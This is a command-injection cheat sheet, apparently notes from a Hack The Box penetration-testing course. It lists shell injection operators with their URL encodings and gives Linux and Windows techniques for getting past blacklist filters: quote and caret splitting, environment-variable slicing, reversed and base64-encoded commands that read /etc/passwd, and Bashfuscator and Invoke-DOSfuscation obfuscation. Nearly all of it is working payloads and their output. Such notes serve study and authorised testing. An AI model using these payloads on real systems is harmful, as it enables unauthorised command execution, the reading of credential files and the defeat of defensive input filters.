3. Command Injection
| Injection Operator | Injection Character | URL-Encoded Character | Executed Command | |
|---|---|---|---|---|
| Semicolon | ; |
%3b |
Both | |
| New Line | \n |
%0a |
Both | |
| Background | & |
%26 |
Both (second output generally shown first) | |
| Pipe | ` | ` | %7c |
Both (only second output is shown) |
| AND | && |
%26%26 |
Both (only if first succeeds) | |
| OR | || |
%7c%7c |
Second (only if first fails) | |
| Sub-Shell | `````` | %60%60 |
Both (Linux-only) | |
| Sub-Shell | $() |
%24%28%29 |
Both (Linux-only) | |
| Tab | %09 |
|||
Brace e.g. {ls,-la} |
Injection types
| Injection Type | Operators |
|---|---|
| SQL Injection | ' , ; -- /* */ |
| Command Injection | ; && |
| LDAP Injection | * ( ) & |
| XPath Injection | ' or and not substring concat count |
| OS Command Injection | ; & |
| Code Injection | ' ; -- /* */ $() ${} #{} %{} ^ |
| Directory Traversal/File Path Traversal | ../ ..\ %00 |
| Object Injection | ; & |
| XQuery Injection | ' ; -- /* */ |
| Shellcode Injection | \x \u %u %n |
| Header Injection | \n \r\n \t %0d %0a %09 |
Bypass blacklisted chars
Linux
printenv
$ echo ${PATH}
/usr/local/bin:/usr/bin:/bin:/usr/games
$ echo ${PATH:0:1}
/
$ echo ${LS_COLORS:10:1}
;
Windows
Get-ChildItem Env
echo %HOMEPATH:~6,-11%
$env:HOMEPATH[0]
$env:PROGRAMFILES[10]
Bypassing Blacklisted commands
Linux
$ w'h'o'am'i
21y4d
$ w"h"o"am"i
21y4d
who$@ami
w\ho\am\i
Windows
C:\>who^ami
## Reverse
$ (tr "[A-Z]" "[a-z]"<<<"WhOaMi")
21y4d
$(a="WhOaMi";printf %s "${a,,}")
$ echo 'whoami' | rev
imaohw
$ $(rev<<<'imaohw')
21y4d
Windows
> "whoami"[-1..-20] -join ''
imaohw
> iex "$('imaohw'[-1..-20] -join '')"
21y4d
## Encoding
LINUX
$ echo -n 'cat /etc/passwd | grep 33' | base64
Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==
$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
WINDOWS
> [Convert]::ToBase64StringUnicode.GetBytes('whoami')
dwBoAG8AYQBtAGkA
$ echo -n whoami | iconv -f utf-8 -t utf-16le | base64
dwBoAG8AYQBtAGkA
> iex "$FromBase64String('dwBoAG8AYQBtAGkA'))"
21y4d
Evasion Tools
Linux
https://github.com/Bashfuscator/Bashfuscator
$ git clone https://github.com/Bashfuscator/Bashfuscator
$ cd Bashfuscator
$ python3 setup.py install --user
$ cd ./bashfuscator/bin/
$ ./bashfuscator -h
$ ./bashfuscator -c 'cat /etc/passwd'
$ ./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
$ bash -c 'eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'
Windows
https://github.com/danielbohannon/Invoke-DOSfuscation
PS C:\htb> git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
PS C:\htb> cd Invoke-DOSfuscation
PS C:\htb> Import-Module .\Invoke-DOSfuscation.psd1
PS C:\htb> Invoke-DOSfuscation
Invoke-DOSfuscation> help
Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1